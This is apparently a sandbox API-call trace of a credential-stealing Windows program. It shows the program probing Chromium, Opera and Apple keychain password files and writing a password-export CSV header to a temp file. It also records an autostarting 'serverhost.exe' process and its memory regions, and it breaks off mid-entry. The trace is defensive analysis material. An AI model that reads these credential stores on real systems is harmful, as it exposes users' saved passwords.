[0088.607] wcslen (_String="*.*") returned 0x3 [0088.607] wcscpy (in: _Dest=0x28af7c, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data" [0088.608] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data") returned 0x39 [0088.608] wcscat (in: _Dest=0x28af7c, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data\\" [0088.608] wcscat (in: _Dest=0x28af7c, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data\\*.*" [0088.608] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 0xffffffff [0088.608] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28b764, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 1 [0088.608] wcslen (_String="Apple Computer\\Preferences\\keychain.plist") returned 0x29 [0088.608] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.608] wcscpy (in: _Dest=0x28c798, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" [0088.608] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.608] wcscat (in: _Dest=0x28c798, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0088.608] wcscat (in: _Dest=0x28c798, _Source="Apple Computer\\Preferences\\keychain.plist" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist" [0088.608] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\apple computer\\preferences\\keychain.plist")) returned 0xffffffff [0088.608] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28cbb8, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 1 [0088.608] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.608] wcslen (_String="Opera\\Opera\\wand.dat") returned 0x14 [0088.608] wcscpy (in: _Dest=0x28c9a8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" [0088.608] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.608] wcscat (in: _Dest=0x28c9a8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0088.608] wcscat (in: _Dest=0x28c9a8, _Source="Opera\\Opera\\wand.dat" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\Opera\\wand.dat") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\Opera\\wand.dat" [0088.608] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\Opera\\wand.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\opera\\opera\\wand.dat")) returned 0xffffffff [0088.608] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.608] wcslen (_String="Opera\\Opera7\\profile\\wand.dat") returned 0x1d [0088.608] wcscpy (in: _Dest=0x28c9a8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" [0088.608] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.608] wcscat (in: _Dest=0x28c9a8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0088.608] wcscat (in: _Dest=0x28c9a8, _Source="Opera\\Opera7\\profile\\wand.dat" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat" [0088.608] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\opera\\opera7\\profile\\wand.dat")) returned 0xffffffff [0088.609] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.609] wcslen (_String="Opera") returned 0x5 [0088.609] wcscpy (in: _Dest=0x28c588, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" [0088.609] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.609] wcscat (in: _Dest=0x28c588, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0088.609] wcscat (in: _Dest=0x28c588, _Source="Opera" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera" [0088.609] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera") returned 0x2e [0088.609] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera") returned 0x2e [0088.609] wcslen (_String="*.*") returned 0x3 [0088.609] wcscpy (in: _Dest=0x28b98c, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera" [0088.609] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera") returned 0x2e [0088.609] wcscat (in: _Dest=0x28b98c, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\" [0088.609] wcscat (in: _Dest=0x28b98c, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\*.*" [0088.609] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\*.*", lpFindFileData=0x28bc14 | out: lpFindFileData=0x28bc14) returned 0xffffffff [0088.609] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.609] wcslen (_String="Opera Software\\Opera Stable\\Login Data") returned 0x26 [0088.609] wcscpy (in: _Dest=0x28c798, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" [0088.609] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0088.609] wcscat (in: _Dest=0x28c798, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0088.609] wcscat (in: _Dest=0x28c798, _Source="Opera Software\\Opera Stable\\Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" [0088.609] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\opera software\\opera stable\\login data")) returned 0xffffffff [0088.609] FreeLibrary (hLibModule=0x6f4d0000) returned 1 [0088.610] FreeLibrary (hLibModule=0x764f0000) returned 1 [0088.611] _wcsicmp (_String1="/nosort", _String2="/scomma") returned -5 [0088.611] _wcsicmp (_String1="/nosort", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0088.611] qsort (in: _Base=0x0, _NumOfElements=0x0, _SizeOfElements=0x1028, _PtFuncCompare=0x40dbe1 | out: _Base=0x0) [0088.611] SetCursor (hCursor=0x10007) returned 0x10007 [0088.611] CreateFileW (lpFileName="C:\\ProgramData\\C571.tmp" (normalized: "c:\\programdata\\c571.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xdc [0088.615] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0088.615] SetCursor (hCursor=0x10007) returned 0x10007 [0088.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="URL", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URL", lpUsedDefaultChar=0x0) returned 4 [0088.616] strlen (_Str="URL") returned 0x3 [0088.616] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x3, lpOverlapped=0x0) returned 1 [0088.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0088.617] strlen (_Str=",") returned 0x1 [0088.617] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x1, lpOverlapped=0x0) returned 1 [0088.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Web Browser", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Web Browser", lpUsedDefaultChar=0x0) returned 12 [0088.617] strlen (_Str="Web Browser") returned 0xb [0088.617] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0xb, lpOverlapped=0x0) returned 1 [0088.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0088.617] strlen (_Str=",") returned 0x1 [0088.617] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x1, lpOverlapped=0x0) returned 1 [0088.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="User Name", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="User Name", lpUsedDefaultChar=0x0) returned 10 [0088.617] strlen (_Str="User Name") returned 0x9 [0088.617] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x9, lpOverlapped=0x0) returned 1 [0088.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0088.617] strlen (_Str=",") returned 0x1 [0088.618] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x1, lpOverlapped=0x0) returned 1 [0088.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Password", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Password", lpUsedDefaultChar=0x0) returned 9 [0088.618] strlen (_Str="Password") returned 0x8 [0088.618] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x8, lpOverlapped=0x0) returned 1 [0088.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0088.618] strlen (_Str=",") returned 0x1 [0088.618] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x1, lpOverlapped=0x0) returned 1 [0088.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Password Strength", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Password Strength", lpUsedDefaultChar=0x0) returned 18 [0088.618] strlen (_Str="Password Strength") returned 0x11 [0088.618] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x11, lpOverlapped=0x0) returned 1 [0088.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0088.618] strlen (_Str=",") returned 0x1 [0088.618] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x1, lpOverlapped=0x0) returned 1 [0088.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="User Name Field", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="User Name Field", lpUsedDefaultChar=0x0) returned 16 [0088.618] strlen (_Str="User Name Field") returned 0xf [0088.618] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0xf, lpOverlapped=0x0) returned 1 [0088.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0088.618] strlen (_Str=",") returned 0x1 [0088.618] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x1, lpOverlapped=0x0) returned 1 [0088.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Password Field", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Password Field", lpUsedDefaultChar=0x0) returned 15 [0088.618] strlen (_Str="Password Field") returned 0xe [0088.619] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0xe, lpOverlapped=0x0) returned 1 [0088.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0088.619] strlen (_Str=",") returned 0x1 [0088.619] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x1, lpOverlapped=0x0) returned 1 [0088.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Created Time", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Created Time", lpUsedDefaultChar=0x0) returned 13 [0088.619] strlen (_Str="Created Time") returned 0xc [0088.619] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0xc, lpOverlapped=0x0) returned 1 [0088.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0088.619] strlen (_Str=",") returned 0x1 [0088.619] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0x1, lpOverlapped=0x0) returned 1 [0088.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Modified Time", cchWideChar=-1, lpMultiByteStr=0x28d3e0, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Modified Time", lpUsedDefaultChar=0x0) returned 14 [0088.619] strlen (_Str="Modified Time") returned 0xd [0088.619] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x28f3e0, lpOverlapped=0x0 | out: lpBuffer=0x28d3e0*, lpNumberOfBytesWritten=0x28f3e0*=0xd, lpOverlapped=0x0) returned 1 [0088.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x28d3e4, cbMultiByte=8191, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0088.619] strlen (_Str="\r\n") returned 0x2 [0088.619] WriteFile (in: hFile=0xdc, lpBuffer=0x28d3e4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f3e4, lpOverlapped=0x0 | out: lpBuffer=0x28d3e4*, lpNumberOfBytesWritten=0x28f3e4*=0x2, lpOverlapped=0x0) returned 1 [0088.619] CloseHandle (hObject=0xdc) returned 1 [0088.620] SetCursor (hCursor=0x10007) returned 0x10007 [0088.620] DeleteObject (ho=0x2a0a08f4) returned 1 [0088.621] exit (_Code=0) Thread: id = 93 os_tid = 0xc80 Process: id = "15" image_name = "serverhost.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe" page_root = "0x7f1bb3c0" os_pid = "0x744" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ecd9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2345 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2346 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2347 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2348 start_va = 0x9e0000 end_va = 0x9fafff entry_point = 0x9e0000 region_type = mapped_file name = "serverhost.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe") Region: id = 2349 start_va = 0x76ef0000 end_va = 0x7702bfff entry_point = 0x76ef0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2350 start_va = 0x77130000 end_va = 0x77130fff entry_point = 0x77130000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2351 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2352 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 2353 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2354 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2355 start_va = 0x751a0000 end_va = 0x751e9fff entry_point = 0x751a0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2356 start_va = 0x76500000 end_va = 0x765d3fff entry_point = 0x76500000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2357 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2358 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2359 start_va = 0x71b80000 end_va = 0x71c03fff entry_point = 0x71b80000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 2360 start_va = 0x75150000 end_va = 0x75161fff entry_point = 0x75150000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2361 start_va = 0x75310000 end_va = 0x75336fff entry_point = 0x75310000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2362 start_va = 0x75340000 end_va = 0x753dffff entry_point = 0x75340000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2363 start_va = 0x753e0000 end_va = 0x7546efff entry_point = 0x753e0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2364 start_va = 0x754f0000 end_va = 0x75590fff entry_point = 0x754f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2365 start_va = 0x756a0000 end_va = 0x7573cfff entry_point = 0x756a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2366 start_va = 0x75740000 end_va = 0x76389fff entry_point = 0x75740000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2367 start_va = 0x76800000 end_va = 0x7695bfff entry_point = 0x76800000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2368 start_va = 0x76bc0000 end_va = 0x76bc9fff entry_point = 0x76bc0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2369 start_va = 0x76bd0000 end_va = 0x76c98fff entry_point = 0x76bd0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2370 start_va = 0x76ca0000 end_va = 0x76e3cfff entry_point = 0x76ca0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2371 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 